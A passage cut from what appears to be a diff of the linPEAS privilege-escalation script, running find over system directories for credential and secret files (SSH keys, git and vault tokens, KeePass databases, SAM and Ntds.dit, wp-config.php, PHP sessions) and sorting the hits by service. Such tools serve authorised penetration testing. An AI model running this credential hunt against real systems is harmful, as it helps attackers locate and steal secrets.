-name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"ssh*config\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_VAR=`eval_bckgrd "find /var -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"sess_*\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` wait # Always wait at the end CONT_THREADS=0 #Reset the threads counter #GENERATE THE STORAGES OF THE FOUND FILES - PSTORAGE_SYSTEMD=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/lib64|^/.cache|^/bin|^/var|^/etc|^/mnt|^/private|^/usr|^/cdrom|^/opt|^/system|^/snap|^/lib32|^/lib|^/srv|^/run|^/applications|^/tmp|^/sys|^/media|^/systemd|^/sbin|^$GREPHOMESEARCH" | grep -E ".*\.service$" | sort | uniq | head -n 70) - PSTORAGE_TIMER=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/lib64|^/.cache|^/bin|^/var|^/etc|^/mnt|^/private|^/usr|^/cdrom|^/opt|^/system|^/snap|^/lib32|^/lib|^/srv|^/run|^/applications|^/tmp|^/sys|^/media|^/systemd|^/sbin|^$GREPHOMESEARCH" | grep -E ".*\.timer$" | sort | uniq | head -n 70) - PSTORAGE_SOCKET=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/lib64|^/.cache|^/bin|^/var|^/etc|^/mnt|^/private|^/usr|^/cdrom|^/opt|^/system|^/snap|^/lib32|^/lib|^/srv|^/run|^/applications|^/tmp|^/sys|^/media|^/systemd|^/sbin|^$GREPHOMESEARCH" | grep -E ".*\.socket$" | sort | uniq | head -n 70) - PSTORAGE_DBUS=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) - PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "mysql$" | sort | uniq | head -n 70) - PSTORAGE_POSTGRESQL=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) - PSTORAGE_APACHE=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "sites-enabled$|000-default$" | sort | uniq | head -n 70) - PSTORAGE_PHPCOOKIES=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/tmp|^/var|^/mnt" | grep -E "sess_.*$" | sort | uniq | head -n 70) - PSTORAGE_PHP_FILES=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_WORDPRESS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) - PSTORAGE_DRUPAL=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E '/default/settings.php' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_MOODLE=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E 'moodle/config.php' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "config\.php$" | sort | uniq | head -n 70) - PSTORAGE_TOMCAT=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) - PSTORAGE_MONGO=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) - PSTORAGE_SUPERVISORD=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) - PSTORAGE_CESI=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) - PSTORAGE_RSYNC=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) - PSTORAGE_HOSTAPD=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_VNC=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) - PSTORAGE_LDAP=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "ldap$" | sort | uniq | head -n 70) - PSTORAGE_OPEN_VPN=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) - PSTORAGE_SSH_FILES=$(echo -e 